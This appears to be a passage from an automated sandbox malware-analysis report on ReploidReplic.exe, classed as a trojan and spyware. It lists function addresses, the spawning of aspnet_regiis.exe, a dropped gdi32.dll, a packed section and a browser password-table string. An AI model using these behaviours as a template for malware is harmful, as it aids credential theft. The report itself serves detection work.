                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BD9402_2_008BD940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A61602_2_008A6160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CF1662_2_008CF166
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D39602_2_008D3960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B59662_2_008B5966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C49742_2_008C4974
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A42802_2_008A4280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DEA802_2_008DEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CC2822_2_008CC282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF2F62_2_008DF2F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CCAF12_2_008CCAF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CCA352_2_008CCA35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CC26C2_2_008CC26C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BD2602_2_008BD260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C3A602_2_008C3A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C238D2_2_008C238D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AEB802_2_008AEB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BC3CC2_2_008BC3CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A73C02_2_008A73C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A4BC02_2_008A4BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF3C02_2_008DF3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D93D02_2_008D93D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C3BE02_2_008C3BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BAB002_2_008BAB00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D73002_2_008D7300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D2B102_2_008D2B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF3302_2_008DF330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CCB4C2_2_008CCB4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C63402_2_008C6340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C63602_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C1C802_2_008C1C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BDC902_2_008BDC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C74A52_2_008C74A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C7CB02_2_008C7CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF4502_2_008DF450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C847D2_2_008C847D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D9C702_2_008D9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AAD902_2_008AAD90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D6DB22_2_008D6DB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B4DC02_2_008B4DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D7DE02_2_008D7DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CFDF92_2_008CFDF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A65F02_2_008A65F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D150E2_2_008D150E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DC5102_2_008DC510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BD5302_2_008BD530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D65542_2_008D6554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D2D702_2_008D2D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AED752_2_008AED75
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BDE902_2_008BDE90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A2ED02_2_008A2ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AC6F02_2_008AC6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DFE202_2_008DFE20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BFE7C2_2_008BFE7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B6F8D2_2_008B6F8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CF7BC2_2_008CF7BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C37D02_2_008C37D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B7FE12_2_008B7FE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008BEFE02_2_008BEFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B87402_2_008B8740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C8F6C2_2_008C8F6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B47772_2_008B4777
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 008B4110 appears 83 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 008A7EE0 appears 44 times
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224
                Source: ReploidReplic.exe, 00000000.00000000.1734942389.00000000008B0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNathanZacharyEleanor.pdfnN4 vs ReploidReplic.exe
                Source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ReploidReplic.exe
                Source: ReploidReplic.exeBinary or memory string: OriginalFilenameNathanZacharyEleanor.pdfnN4 vs ReploidReplic.exe
                Source: ReploidReplic.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ReploidReplic.exeStatic PE information: Section: KzTnD~C ZLIB complexity 1.0003179097347121
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@3/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D8860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_008D8860
                Source: C:\Users\user\Desktop\ReploidReplic.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2312
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c3ebb3f4-06b7-43fe-9652-fb446222a9c3Jump to behavior
                Source: ReploidReplic.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\ReploidReplic.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1793435477.0000000005218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ReploidReplic.exeReversingLabs: Detection: 60%
                Source: ReploidReplic.exeString found in binary or memory: -addpset
                Source: ReploidReplic.exeString found in binary or memory: -addfulltrust
                Source: ReploidReplic.exeString found in binary or memory: -addgroup
                Source: ReploidReplic.exeString found in binary or memory: -help
                Source: C:\Users\user\Desktop\ReploidReplic.exeFile read: C:\Users\user\Desktop\ReploidReplic.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ReploidReplic.exe "C:\Users\user\Desktop\ReploidReplic.exe"
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: ReploidReplic.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ReploidReplic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbo source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: %%.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER1976.tmp.dmp.5.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WER1976.tmp.dmp.5.dr
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Desktop\ReploidReplic.PDB source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER1976.tmp.dmp.5.dr
                Source: Binary string: \??\C:\Users\user\Desktop\ReploidReplic.PDBB source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb\ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\ReploidReplic.exeUnpacked PE file: 0.2.ReploidReplic.exe.800000.0.unpack KzTnD~C:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                Source: ReploidReplic.exeStatic PE information: section name: KzTnD~C
                Source: ReploidReplic.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0085FA80 push eax; mov dword ptr [esp], 5B5A5908h0_2_0085FA85
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008024E8 push esp; retf 0_2_008024E9
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_00803E6C push esi; retf 0_2_00803E6D
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008047D2 push ecx; iretd 0_2_008047D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF000 push eax; mov dword ptr [esp], 5B5A5908h2_2_008DF005
                Source: ReploidReplic.exeStatic PE information: section name: KzTnD~C entropy: 7.999695257845116
                Source: C:\Users\user\Desktop\ReploidReplic.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
